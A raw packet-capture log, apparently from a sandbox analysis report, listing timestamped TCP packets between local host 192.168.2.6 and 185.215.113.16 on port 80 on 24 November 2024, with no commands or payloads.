                                                                                                                                                                                              Nov 24, 2024 13:39:27.821809053 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.823786020 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.823821068 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.823865891 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.825934887 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.826131105 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.826179981 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.828114986 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.828150034 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.828198910 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.830212116 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.830284119 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.830549955 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.832550049 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.832583904 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.832636118 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.834826946 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.835028887 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.835082054 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.836950064 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.837140083 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.837178946 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.839246988 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.839282036 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.839349031 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.841547012 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.841583014 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.841651917 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.843713045 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.843929052 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.843978882 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.846023083 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.846061945 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.846110106 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.846400976 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.846533060 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.846575022 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.849167109 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.849289894 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.849335909 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.853915930 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.853950977 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.854006052 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.856671095 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.856687069 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.856750965 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.858309984 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.858490944 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.858536959 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.860083103 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.860275030 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.860317945 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.861917973 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.862097025 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.862145901 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.863724947 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.917494059 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.932673931 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.932729006 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.932787895 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.933840990 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.933919907 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.933970928 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.935857058 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.935944080 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.935986042 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.938159943 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.971323967 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.971354008 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.971369982 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.971975088 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.972014904 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.972021103 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.973637104 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.973676920 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.973696947 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.975501060 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.975547075 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.975585938 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.977169991 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.977211952 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.977216959 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.978646994 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.978697062 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.978782892 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.979652882 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.979685068 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.979749918 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.980794907 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.980837107 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.980882883 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.981636047 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.981673002 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.981749058 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.982676983 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.982711077 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.982811928 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.983732939 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.983771086 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.983792067 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.984615088 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.984656096 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.984724045 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.985707045 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.985753059 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.985805988 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.986628056 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.986669064 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.986713886 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.987714052 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.987762928 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.987910986 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.988858938 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.988898039 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.988898993 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.989682913 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.989723921 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.989768028 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.990741968 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.990777969 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.990859032 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.991614103 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.991628885 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.991653919 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.992538929 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.992579937 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.992619038 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.993568897 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.993614912 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.993681908 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.994534016 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.994577885 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.994647980 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.995652914 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.995691061 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.995758057 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.996532917 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.996578932 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.996774912 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.997586966 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.997601986 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.997632980 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.998495102 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.998539925 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.998589993 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.999752045 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.999768019 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.999804974 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.000607967 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.000653028 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.000678062 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.001476049 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.001519918 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.001585007 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.002507925 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.002552032 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.002573967 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.003456116 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.003498077 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.003532887 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.004440069 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.004476070 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.004529953 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.005445957 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.005482912 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.005541086 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.006481886 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.006522894 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.006548882 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.007420063 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.007458925 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.007577896 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.008518934 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.008543968 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.008557081 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.009398937 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.009437084 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.009464025 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.010427952 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.010468960 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.010550976 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.011462927 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.011477947 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.011498928 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.012408972 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.012453079 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.012562037 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.013545990 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.013582945 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.013691902 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.014627934 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.014667988 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.014710903 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.015475988 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.015512943 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.015556097 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.016336918 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.016371965 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.016395092 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.017371893 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.017406940 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.017443895 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.018533945 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.018563032 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.018570900 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.019359112 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.019396067 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.019442081 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.020348072 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.020389080 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.020409107 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.021336079 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.021368980 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.021433115 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.022305012 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.022342920 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.022449970 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.023292065 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.023328066 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.143141985 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.143269062 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.143332958 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.143634081 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.143698931 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.143757105 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.144645929 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.144721031 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.144767046 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.145952940 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.182306051 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.182394028 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.182547092 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.182890892 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.182938099 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.183165073 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.184325933 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.184436083 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.184499025 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.185656071 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.185715914 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.185797930 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.187100887 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.187174082 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.187235117 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.188566923 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.188613892 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.188678980 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.189939976 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.189990044 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.190038919 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.190741062 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.190788031 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.190802097 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.191535950 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.191584110 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.191618919 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.192565918 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.192610979 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.192615986 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.193371058 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.193423986 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.193440914 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.193949938 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.193983078 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.193998098 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.194866896 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.194919109 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.194963932 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.195593119 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.195638895 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.195691109 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.196321964 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.196360111 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.196365118 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.196976900 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.197019100 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.197025061 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.197623014 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.197670937 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.197685003 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.198277950 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.198326111 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.198385954 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.199281931 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.199331999 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:28.199385881 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.200254917 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:28.200316906 CET4975280192.168.2.6185.215.113.16
